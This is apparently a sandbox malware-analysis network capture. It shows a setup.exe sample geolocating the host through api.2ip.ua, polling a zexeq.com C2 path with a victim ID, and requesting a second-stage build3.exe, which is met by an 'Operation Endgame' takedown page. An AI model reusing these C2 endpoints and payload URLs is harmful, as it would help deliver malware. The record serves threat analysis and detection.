              Jul 30, 2024 01:04:43.042604923 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:48.117844105 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:48.133606911 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:48.323374987 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:48.323515892 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:52.744710922 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:52.744762897 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:52.745048046 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:52.761630058 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:52.761646032 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.272207022 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.272516966 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.277808905 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.277838945 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.278119087 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.278384924 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.280313969 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.324500084 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.382994890 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:53.398843050 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:53.589406013 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:53.589483023 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:53.678509951 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.678597927 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.678616047 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.678740025 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.678752899 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.678807020 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:53.678903103 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.679915905 CEST49718443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:53.679938078 CEST44349718188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:58.632397890 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:58.648818970 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:58.840574026 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:58.840639114 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:05:00.590687037 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:00.590722084 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:00.590864897 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:00.603270054 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:00.603282928 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.143274069 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.143412113 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:01.156729937 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:01.156754971 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.157706976 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.157816887 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:01.160500050 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:01.204511881 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.545934916 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.546047926 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:01.546178102 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:01.547482967 CEST49724443192.168.2.6188.114.96.3
              Jul 30, 2024 01:05:01.547503948 CEST44349724188.114.96.3192.168.2.6
              Jul 30, 2024 01:05:47.465869904 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:05:47.465900898 CEST4971480192.168.2.6188.40.141.211
              TimestampSource PortDest PortSource IPDest IP
              Jul 30, 2024 01:04:37.888221025 CEST6454953192.168.2.61.1.1.1
              Jul 30, 2024 01:04:38.555655956 CEST53645491.1.1.1192.168.2.6
              Jul 30, 2024 01:04:42.021123886 CEST5841353192.168.2.61.1.1.1
              Jul 30, 2024 01:04:42.023367882 CEST5380153192.168.2.61.1.1.1
              Jul 30, 2024 01:04:42.130522013 CEST53584131.1.1.1192.168.2.6
              Jul 30, 2024 01:04:42.356681108 CEST53538011.1.1.1192.168.2.6
              Jul 30, 2024 01:05:27.914706945 CEST5357546162.159.36.2192.168.2.6
              Jul 30, 2024 01:05:28.465823889 CEST53543611.1.1.1192.168.2.6
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 30, 2024 01:04:37.888221025 CEST192.168.2.61.1.1.10x4633Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
              Jul 30, 2024 01:04:42.021123886 CEST192.168.2.61.1.1.10xf86eStandard query (0)uaery.topA (IP address)IN (0x0001)false
              Jul 30, 2024 01:04:42.023367882 CEST192.168.2.61.1.1.10xc9c7Standard query (0)zexeq.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 30, 2024 01:04:38.555655956 CEST1.1.1.1192.168.2.60x4633No error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
              Jul 30, 2024 01:04:38.555655956 CEST1.1.1.1192.168.2.60x4633No error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
              Jul 30, 2024 01:04:42.130522013 CEST1.1.1.1192.168.2.60xf86eName error (3)uaery.topnonenoneA (IP address)IN (0x0001)false
              Jul 30, 2024 01:04:42.356681108 CEST1.1.1.1192.168.2.60xc9c7No error (0)zexeq.com188.40.141.211A (IP address)IN (0x0001)false
              • api.2ip.ua
              • zexeq.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649713188.40.141.211807036C:\Users\user\Desktop\setup.exe
              TimestampBytes transferredDirectionData
              Jul 30, 2024 01:04:42.374666929 CEST137OUTGET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: zexeq.com
              Jul 30, 2024 01:04:43.042503119 CEST571INHTTP/1.1 200 OK
              Content-Type: html; charset=utf-8
              Server: nginx/1.18.0
              Content-Length: 437
              Date: Mon, 29 Jul 2024 23:04:42 GMT
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4f 70 65 72 61 74 69 6f 6e 20 45 6e 64 67 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 76 69 64 65 6f 20 70 6c 61 79 73 69 6e 6c 69 6e 65 20 61 75 74 6f 70 6c 61 79 20 6d 75 74 65 64 20 6c 6f 6f 70 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 6f 75 72 63 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 64 67 61 6d 65 2e 64 64 6e 73 2e 6e 65 74 2f 65 6e 64 67 61 6d 65 22 20 74 79 70 65 3d 22 76 69 64 65 6f 2f 77 65 62 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e [TRUNCATED]
              Data Ascii: <!DOCTYPE html> <html> <head> <title>Operation Endgame</title> </head> <body> <video playsinline autoplay muted loop height="auto" width=100%> <source src="https://opendgame.ddns.net/endgame" type="video/webm"> Your browser does not support the video tag. </video> </body> </html>
              Jul 30, 2024 01:04:48.117844105 CEST137OUTGET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: zexeq.com
              Jul 30, 2024 01:04:48.323374987 CEST571INHTTP/1.1 200 OK
              Content-Type: html; charset=utf-8
              Server: nginx/1.18.0
              Content-Length: 437
              Date: Mon, 29 Jul 2024 23:04:48 GMT
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4f 70 65 72 61 74 69 6f 6e 20 45 6e 64 67 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 76 69 64 65 6f 20 70 6c 61 79 73 69 6e 6c 69 6e 65 20 61 75 74 6f 70 6c 61 79 20 6d 75 74 65 64 20 6c 6f 6f 70 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 6f 75 72 63 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 64 67 61 6d 65 2e 64 64 6e 73 2e 6e 65 74 2f 65 6e 64 67 61 6d 65 22 20 74 79 70 65 3d 22 76 69 64 65 6f 2f 77 65 62 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e [TRUNCATED]
              Data Ascii: <!DOCTYPE html> <html> <head> <title>Operation Endgame</title> </head> <body> <video playsinline autoplay muted loop height="auto" width=100%> <source src="https://opendgame.ddns.net/endgame" type="video/webm"> Your browser does not support the video tag. </video> </body> </html>
              Jul 30, 2024 01:04:53.382994890 CEST137OUTGET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: zexeq.com
              Jul 30, 2024 01:04:53.589406013 CEST571INHTTP/1.1 200 OK
              Content-Type: html; charset=utf-8
              Server: nginx/1.18.0
              Content-Length: 437
              Date: Mon, 29 Jul 2024 23:04:53 GMT
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4f 70 65 72 61 74 69 6f 6e 20 45 6e 64 67 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 76 69 64 65 6f 20 70 6c 61 79 73 69 6e 6c 69 6e 65 20 61 75 74 6f 70 6c 61 79 20 6d 75 74 65 64 20 6c 6f 6f 70 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 6f 75 72 63 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 64 67 61 6d 65 2e 64 64 6e 73 2e 6e 65 74 2f 65 6e 64 67 61 6d 65 22 20 74 79 70 65 3d 22 76 69 64 65 6f 2f 77 65 62 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e [TRUNCATED]
              Data Ascii: <!DOCTYPE html> <html> <head> <title>Operation Endgame</title> </head> <body> <video playsinline autoplay muted loop height="auto" width=100%> <source src="https://opendgame.ddns.net/endgame" type="video/webm"> Your browser does not support the video tag. </video> </body> </html>
              Jul 30, 2024 01:04:58.632397890 CEST137OUTGET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: zexeq.com
              Jul 30, 2024 01:04:58.840574026 CEST571INHTTP/1.1 200 OK
              Content-Type: html; charset=utf-8
              Server: nginx/1.18.0
              Content-Length: 437
              Date: Mon, 29 Jul 2024 23:04:58 GMT
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4f 70 65 72 61 74 69 6f 6e 20 45 6e 64 67 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 76 69 64 65 6f 20 70 6c 61 79 73 69 6e 6c 69 6e 65 20 61 75 74 6f 70 6c 61 79 20 6d 75 74 65 64 20 6c 6f 6f 70 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 6f 75 72 63 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 64 67 61 6d 65 2e 64 64 6e 73 2e 6e 65 74 2f 65 6e 64 67 61 6d 65 22 20 74 79 70 65 3d 22 76 69 64 65 6f 2f 77 65 62 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e [TRUNCATED]
              Data Ascii: <!DOCTYPE html> <html> <head> <title>Operation Endgame</title> </head> <body> <video playsinline autoplay muted loop height="auto" width=100%> <source src="https://opendgame.ddns.net/endgame" type="video/webm"> Your browser does not support the video tag. </video> </body> </html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649714188.40.141.211807036C:\Users\user\Desktop\setup.exe
              TimestampBytes transferredDirectionData
              Jul 30, 2024 01:04:42.375320911 CEST94OUTGET /files/1/build3.exe HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: zexeq.com
              Jul 30, 2024 01:04:43.027211905 CEST571INHTTP/1.1 200 OK
              Content-Type: html; charset=utf-8
              Server: nginx/1.18.0
              Content-Length: 437
              Date: Mon, 29 Jul 2024 23:04:42 GMT
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4f 70 65 72 61 74 69 6f 6e 20 45 6e 64 67 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 76 69 64 65 6f 20 70 6c 61 79 73 69 6e 6c 69 6e 65 20 61 75 74 6f 70 6c 61 79 20 6d 75 74 65 64 20 6c 6f 6f 70 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 6f 75 72 63 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 64 67 61 6d 65 2e 64 64 6e 73 2e 6e 65 74 2f 65 6e 64 67 61 6d 65 22 20 74 79 70 65 3d 22 76 69 64 65 6f 2f 77 65 62 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e [TRUNCATED]
              Data Ascii: <!DOCTYPE html> <html> <head> <title>Operation Endgame</title> </head> <body> <video playsinline autoplay muted loop height="auto" width=100%> <source src="https://opendgame.ddns.net/endgame" type="video/webm"> Your browser does not support the video tag. </video> </body> </html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649711188.114.96.34436316C:\Users\user\Desktop\setup.exe
              TimestampBytes transferredDirectionData
              2024-07-29 23:04:39 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-07-29 23:04:39 UTC891INHTTP/1.1 200 OK
              Date: Mon, 29 Jul 2024 23:04:39 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCZyNxYnvYLR4Po8Lhma1nrgGlbT5j7slmEQbJFsHMnkqdAR%2Fvn7lG%2B49WkOFJs00iEE%2BGMbbieVc1oLF4nxmOUHICTQaJGB0LbGVfUQaD4XXs07sAXmPkxb4H7z"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8ab0bfcd0d47433d-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-29 23:04:39 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-07-29 23:04:39 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649712188.114.96.34437036C:\Users\user\Desktop\setup.exe
              TimestampBytes transferredDirectionData
              2024-07-29 23:04:41 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-07-29 23:04:41 UTC893INHTTP/1.1 200 OK
              Date: Mon, 29 Jul 2024 23:04:41 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=suglL4NP6JKUXQYeqlQcPu5ByFS5ssI9EVD9QVSyO4%2B%2FOFuIVKEMEpsIiHV7xqVEcHWOpNDEYTc7Mukw75PRpD8K%2Fc2ZuXAExN%2Fza%2F4QfrFV7dK5SjpBfLZiNhrl"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8ab0bfdc6cb90f45-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-29 23:04:41 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-07-29 23:04:41 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.649718188.114.96.34434232C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              TimestampBytes transferredDirectionData
              2024-07-29 23:04:53 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-07-29 23:04:53 UTC887INHTTP/1.1 200 OK
              Date: Mon, 29 Jul 2024 23:04:53 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAN6hK2QvNU8g1IBJzN%2B3GsGfWfMc0SZvzlAW2zaHI6URHMceIror5tfmm2Ysv64Q4muqPB2w6AMq1W5yhhfe6AZ5R0S8DvqBZ4%2BYopYSuCVhgzacr1CSVzjXu6A"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8ab0c02598784405-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-29 23:04:53 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-07-29 23:04:53 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.649724188.114.96.34433816C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              TimestampBytes transferredDirectionData
              2024-07-29 23:05:01 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-07-29 23:05:01 UTC889INHTTP/1.1 200 OK
              Date: Mon, 29 Jul 2024 23:05:01 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zbTff7oIcVwMenctt6sakvGXudvVFCZ50VdzM%2BVuQe7UEbhB437k0QBrnmcyyI7sqtGE2UbBm%2Fthw3i18wWQmyd2cfOmStxgQeKUturQzOVOY521E2xjL2%2BQICvS"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8ab0c056b959436d-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-29 23:05:01 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-07-29 23:05:01 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Click to jump to process

